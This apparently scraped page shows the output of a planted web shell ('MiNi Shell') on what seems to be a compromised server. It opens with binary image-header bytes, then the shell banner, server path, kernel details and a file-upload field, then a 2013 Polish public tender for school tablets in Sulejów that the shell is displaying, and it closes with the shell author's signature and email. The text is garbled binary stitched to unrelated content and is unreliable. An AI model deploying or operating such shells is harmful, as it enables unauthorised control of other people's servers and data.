JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130619/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130619/235826-N-2013.html

<p class="kh_header"><b>Sulejów: E - kształcenie szansą na wyrównanie dysproporcji w zakresie dostępu do nowoczesnych form edukacji</b><br>
<b>Numer ogłoszenia: 235826 - 2013; data zamieszczenia: 19.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulejów , ul. Konecka 42, 97-330 Sulejów, woj. łódzkie, tel. 44 6102500, faks 44 6162551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> E - kształcenie szansą na wyrównanie dysproporcji w zakresie dostępu do nowoczesnych form edukacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: 
1.1. Dostawa: - 80 sztuk tabletów (przenośnych komputerów osobistych - nowoczesnych urządzeń umożliwiających komunikację oraz wymianę informacji) z ochraniaczem i systemem operacyjnym; 
1.2. Wdrożenie systemu w szkole 
1.3. Zakup lub stworzenie kompletu oprogramowania na tablety. 
1.4. Przeprowadzenie szkoleń dla kadry pedagogicznej.
1.5. Promocja projektu. 
2. Wspólny Słownik Zamówień - Kody CPV:
30213200-7 - komputer tablet 
37453300-1 - dyski 
32412110-8 - sieć internetowa 
32413100-8 - routery sieciowe 
32421000-0 - okablowanie sieciowe 
32400000-7 - sieci 
80510000-2 - usługi szkolenia specjalistycznego 
48771000-3 - pakiety oprogramowania użytkowego ogólnego 
48190000-6 - pakiety oprogramowania edukacyjnego 

3. Informacje dotyczące przedmiotu zamówienia 
Dostawa 80 szt. tabletów z ochraniaczem i systemem operacyjnym. Tablet to przenośny komputer osobisty. Jest to urządzenie wzorowane na notebookach. Dodano do niego cechę znaną z palmtopów - ekran dotykowy. Przekątne ekranów w tabletach są mniejsze niż w notebookach, np. 7 lub 14 cali, jednakże pozostałe ich parametry (częstotliwość taktowania, wielkość RAM) dorównują notebookom. Tablet posiada wiele ułatwień, np. funkcje rozpoznawania pisma odręcznego, klawiaturę ekranową. Tablet jest urządzeniem przenośnym. Ze względu na zasadę neutralności technologicznej nie podaje się typu urządzenia. Opracowano natomiast główne parametry urządzenia.
Szczegółowe parametry zawarte w SIWZ.
Sprzęt dostarczony w ramach realizacji projektu będzie sprzętem zakupionym w oficjalnym kanale sprzedaży producenta na rynek polski, co oznacza, że będzie on sprzętem posiadającym stosowny pakiet usług gwarancyjnych, wsparcie techniczno - serwisowe kierowane do użytkowników z obszaru Rzeczpospolitej Polskiej. 
Plan rozmieszczenia zakupywanego sprzętu.
Urządzenia będą używane przez uczniów na terenie szkół Gimnazjalnych.
1) Gimnazjum w Sulejowie
97-330 Sulejów
ul. Konecka 45
działka ewid: 93 obręb nr 17 Sulejów
2) Gimnazjum w Przygłowie
97-330 Sulejów
Włodzimierzów,
ul. Ks.Kard.St.Wyszyńskiego 1
działka ewid: 714/5 obręb Włodzimierzów
Tablety są urządzeniami przenośnymi. Głównym założeniem e-kształcenia jest mobilność. Dlatego też urządzenia będą używane przez uczniów w szkole i ewentualnie poza nią. 
Wdrożenie systemu w szkole
Wdrożenie systemów e-kształcenia w 2 szkołach. Usługa ma charakter specjalistyczny. Polega na wdrożeniu systemu e-kształcenia w danej placówce szkolnej: ustanowienie połączeń pomiędzy urządzeniami, wgranie oprogramowania. 
Zakresy usługi obejmuje:
- przygotowanie tabletów do użytkowania (konfiguracja systemów operacyjnych, personalizacja urządzeń, wdrożenie zabezpieczeń sieciowych w urządzeniach, optymalizacja pracy urządzeń pod względem funkcjonalnym i pod względem ilości pobieranej energii),
- połączenie urządzeń zakupywanych w ramach projektu z siecią Wi-Fi działającą na terenie danej szkoły. 
- konfiguracja sieci Wi-Fi,
- konfiguracja połączenia Internetowego z siecią Wi-Fi
- zabezpieczenie sieci,
- instalacja oprogramowania na każdym urządzeniu zakupywanym w ramach projektu wraz jego konfiguracją z istniejąca siecią,
- ustanowienie na wszystkich urządzeniach zabezpieczeń treści (materiały niedozwolone (np. pornografia) lub materiały niepożądane  (np. portale społecznościowe).
Sprzęt dostarczony w ramach realizacji projektu będzie sprzętem zakupionym w oficjalnym kanale sprzedaży producenta na rynek polski, co oznacza, że będzie on sprzętem posiadającym stosowny pakiet usług gwarancyjnych, wsparcie techniczno - serwisowe kierowane do użytkowników z obszaru Rzeczpospolitej Polskiej.
Plan rozmieszczenia zakupywanego sprzętu 
Urządzenia będzie umieszczone w miejscu zapewniającym prawidłową komunikację z innymi elementami sieci w szkole. Dlatego miejsce rozmieszczenia musi być wybrane podczas badań sygnału 
Dostawa lub stworzenie oprogramowania edukacyjnego - 80 kompletów 
Przedmiotem zamówienia jest zakup lub stworzenie kompletu oprogramowania na tablety. Usługa ma charakter specjalistyczny. Polega na zakupie lub stworzeniu kompletu oprogramowania edukacyjnego na tablety. Nowoczesne e-kształcenie potrzebuje treści. Aby ją tworzyć i odczytywać niezbędne jest oprogramowanie, z pomocą którego nauczyciel samodzielnie będzie mógł tworzyć materiały dla uczniów, a uczeń z łatwością je otrzymywać i odczytywać. Jest to udogodnienie, które w kolejnych latach usprawni proces dydaktyczny. Z pomocą programu nauczyciel może sam przygotować (w domu czy w szkole) materiał, skrypt dla uczniów. Musi jednocześnie móc przekonwertować stworzony materiał do pliku odczytywalnego przez tablet (koniecznie na otwarty format, może być E-Pub ). Stworzony skrypt dla uczniów musi być odczytany przez ich tablety i inne urządzenia przenośne np. smartfony. Skrypty muszą mieć możliwość zmiany koloru tła, czcionki. Celem jest przystosowanie treści dla osób niepełnosprawnych lub osób z wadą wzroku. Program musi mieć możliwość dodawania notatek pisemnych, rysunkowych, komentarzy głosowych. Nauczyciele muszą mieć możliwość edycji treści bez względu na rodzaj urządzenia komputerowego i zainstalowane oprogramowanie. Kierować się należy w tym zakresie neutralnością technologiczną. Program do odczytu treści musi być zainstalowany na tabletach. Zastosowanie oprogramowania ma stworzyć nowe możliwości w szkole. Łatwe przekazywanie treści (również multimedialnej) jest niezwykle ważnym elementem e-kształcenia. Uczniowie będą mieć nieskrępowany dostęp do tworzonej w szkole bazy materiałów. Bazy takie dostępne są również w Internecie (np. projekt Scholaris). E-kształcenie pozwoli jednocześnie na stopniową rezygnację z tradycyjnych podręczników. Łatwość doboru materiałów, tworzenie własnych pozwoli nauczycielom na lepszą i efektywniejszą naukę przedmiotów. Program ma niezwykłą wartość dla rodzin ubogich, dla których zakup podręczników stanowi problem. Program pozwoli jednocześnie na dostęp do bazy danych materiałów przez Internet. Dzieci przebywające w domu z powodu choroby lub innych przyczyn (na terenach wiejskich głównie pogodowych), nie będą musiały rezygnować z nauki. System jest więc połączeniem e-kształcenia oraz e-learningu. E-kształcenie wymaga tez użycia oprogramowania tematycznego do nauki danych przedmiotów. Ze względu na bardzo szybkie zmiany na rynku przewiduje się podstawowy zakres oprogramowania bez określenia producenta. Ostateczne wytyczne co do wymogów aplikacji zostaną opublikowane w SWIZ inwestycji. Pamiętać należy, iż codziennie publikowanych jest co najmniej 500 nowych aplikacji edukacyjnych. 
Podstawowe programy, które powinny być zainstalowane w tabletach:
1. Program do edycji skryptów
- Aplikacja EDYTOR umożliwiająca tworzenie i odtwarzanie materiałów edukacyjnych dla uczniów.
Aplikacja umożliwia tworzenie multimedialnych materiałów edukacyjnych przez nauczycieli dla uczniów. Podstawową funkcjonalnością edytora będą takie funkcje jak:
- logowanie
- formatowanie tekstu (dodatkowa możliwość tworzenia wzorów chemicznych oraz matematycznych)
- sprawdzanie błędów ortograficznych
- dodawanie multimediów (zdjęcia, filmy, animacje, dźwięki),
- dodawanie notatek tekstowych i głosowych,
- dodawanie hiperłączy,
- udostępnianie materiałów dla uczniów (Udostępniane materiały muszą znajdować się na serwerze - uczniowie posiadają dostęp lokalny oraz zdalny)
- możliwość tworzenia haseł do odczytu materiałów
- Tworzone multimedia muszą posiadać niezbędne zabezpieczenia przeciw niepożądanemu kopiowaniu i powielaniu.  
2. Aplikacja CZYTNIK umożliwiająca odczyt materiałów edukacyjnych tworzonych przy pomocy aplikacji EDYTOR. Aplikacja CZYTNIK umożliwia sprawne pobieranie i odczyt materiałów tworzonych przez EDYTOR oraz udostępnianych na serwerze. Aplikacja powinna działać na ogólnodostępnym darmowym systemie zainstalowanym na urządzeniach mobilnych.
Podstawowe funkcje aplikacji CZYTNIK:
- Logowanie
- Automatyczne pobieranie materiałów udostępnianych na serwerze, gdy tylko użytkownik jest w zasięgu sieci Internet
- Odczyt materiałów tworzonych przy pomocy aplikacji EDYTOR
- Tworzenie notatek
3. Program do odczytu plików różnych formatów tekstowych (doc, docx, PDF i inne).
4. Program do edycji dokumentów tekstowych.
5. Program pocztowy.
6. Program do tworzenia map pamięci.
7. Zestaw map historycznych.
8. Ciało człowieka i zwierząt w 3D (podróż do wnętrza).
9. Program umożliwiający dostęp do map satelitarnych.
10. Przeglądarka internetowa.
11. Interaktywna mapa nieba.
12. Przeglądarka plików tekstowych
Proponowane oprogramowanie musi być zgodne z platformą systemu operacyjnego tabletów oferowanych w ramach tego postępowania.
Szkolenia nauczycieli. 
Usługa ma charakter specjalistyczny. Przeprowadzenie szkoleń dla kadry pedagogicznej. Terminy szkoleń należy uzgodnić z dyrektorem Gimnazjum w Sulejowie i dyrektorem Gimnazjum w Przygłowie. Zakresy usługi obejmuje:
- szkolenie grupowe dla nauczycieli danej specjalności (uzasadnienie: nauczyciel danej specjalności (np. geografia) musi posiadać umiejętności z korzystania z możliwości sieci oraz użycia poszczególnych programów komputerowych dla wdrożenia efektywnego e-kształcenia). Wymagane jest szkolenie minimum 6 godziny dla każdej grupy nauczycieli.
- szkolenia grupowe (uzasadnienie: szkolenie dotyczyć będzie działania sieci, możliwości poszczególnych urządzeń, podstawowych zasad działania Internetu, dysku sieciowego). Wymagane jest szkolenie minimum 12 godzin. 
- szkolenie dla wszystkich nauczycieli z zakresu wykorzystania e-kształcenia w celu poniesienia jakości nauczania wśród osób niepełnosprawnych (3 godziny)
- przeszkolenie z programów :
* Program do edycji skryptów i czytnik materiałów edukacyjnych
* Program do odczytu plików różnych formatów tekstowych (doc, docx, PDF i inne)
* Program do edycji dokumentów tekstowych.
* Program pocztowy.
* Program do tworzenia map pamięci.
* Program Zestaw map historycznych.
* Program Ciało człowieka i zwierząt w 3D (podróż do wnętrza).
* Program umożliwiający dostęp do map satelitarnych.
* Przeglądarka internetowa.
* Program Interaktywna mapa nieba.
* Przeglądarka plików tekstowych
- szkolenie z zakresu obsługi programu do tworzenia i przesyłania skryptów, materiałów (12 godzin).
Ogólnie przewiduje się przeprowadzenie łącznie - 33 godziny (ilość godzin dla dwóch szkół łącznie).
Promocja 
Rodzaj usługi to promocja projektu. Charakter usługi - usługa ma charakter specjalistyczny. Polega na kompleksowej promocji projektu finansowanego ze środków Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007 - 2013. Zakres usługi - wykonawca usługi zobowiązuje się przestrzegać i postępować zgodnie z zapisami Rozporządzenia (WE) nr 1828/2006 oraz Zasadami promocji projektów dla beneficjentów Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013. Zasady promocji przewidują dla przedmiotowego projektu wykonanie plakietek informacyjnych do oznakowania zakupionych środków trwałych o wymiarze nie mniejszym niż 8x5 cm, które zostaną umieszczone na wszystkich zakupywanych urządzeniach, tj. m.in.: tabletach, routerach. Plakietki informacyjne muszą być wykonane zgodnie z Zasadami promocji i zawierać logotyp Unii Europejskiej, logotyp Programu Regionalnego, opis Projekt współfinansowany przez Unię Europejska z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013. 
Wszystkie nazwy własne użyte w dokumentacji przetargowej, określające typ produktu lub producenta, zostały podane przykładowo w celu określenia minimalnych oczekiwanych parametrów jakościowych, funkcjonalnych i użytkowych produktu. Dopuszcza się składanie rozwiązań równoważnych do opisanych przez Zamawiającego, zgodnie z zasadami określonymi w art. 30 ust. 5 ustawy Prawo zamówień publicznych. Wykonawca oferując przedmiot równoważny do opisanego w SIWZ jest zobowiązany zachować równoważność w zakresie parametrów jakościowych, użytkowych i funkcjonalnych, które muszą być na poziomie nie niższym od wskazanych przez Zamawiającego. W takim przypadku Wykonawca zobowiązany jest przedstawić wraz z ofertą jego szczegółową specyfikację - dokładny opis i wskazanie źródła informacji, potwierdzających równoważność oferowanych towarów(produktów) zamówienia wraz ze wskazaniem producenta.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.32.00-7, 37.45.33.00-1, 32.41.21.10-8, 32.41.31.00-8, 32.42.10.00-0, 32.40.00.00-7, 80.51.00.00-2, 48.77.10.00-3, 48.19.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanych oświadczeń o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 i o nie podleganiu wykluczeniu na podstawie art. 24 Ustawy Prawo Zamówień Publicznych, oraz gdy Wykonawca załączy aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych, oraz gdy Wykonawca wykaże iż będzie dysponował osobami, które posiadają kwalifikacje (np. wykształcenie, kursy) umożliwiające przeprowadzenie szkoleń wskazanych w przedmiocie zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykaz dokumentów: 
1.1 Oferta według wzoru stanowiącego załącznik nr 1 do SIWZ (formularz ofertowy). 
1.2 Kosztorys ofertowy, którego formularz stanowi załącznik nr 2 do SIWZ. 
1.3 Oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ. 
1.3.1 Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W celu wykazania spełnienia przez wykonawcę warunków udziału 
w postępowaniu, oraz wykazania braku podstaw do wykluczenia Wykonawcy z postępowania Zamawiający żąda następujących rodzajów dokumentów oraz form w jakich te dokumenty mają być składane, o których mowa 
w Rozporządzeniu Prezesa rady Ministrów z dnia 19 lutego 2013r. (Dz. U. z 2013r., poz. 231): 
1.4 Oświadczenie o braku podstaw do wykluczeniu z postępowania według załącznika nr 4 do SIWZ. 
1.5 Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia (załącznik nr 5 do SIWZ)
1.6 Oświadczenie o podwykonawcach (załącznik nr 6 do SIWZ). 
1.7 Oświadczenie o akceptacji warunków umowy (załącznik nr 7 do SIWZ). 
1.8 Opis (techniczny) zawierający nazwę, typ i model proponowanych urządzeń 
i rozwiązań oraz instrukcje obsługi urządzeń będących przedmiotem dostawy, zawierający nazwę, typ i model proponowanych urządzeń. 
1.9 Oświadczenie Wykonawcy dotyczące przynależności do grupy kapitałowej (załącznik nr 9 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sulejow.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sulejowie, ul. Konecka 42, 97-330 Sulejów, wejście C, I piętro, pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2013 godzina 09:00, miejsce: Miejski w Sulejowie, ul. Konecka 42, 97-330 Sulejów, wejście A, I piętro, Sekretariat, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejska z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com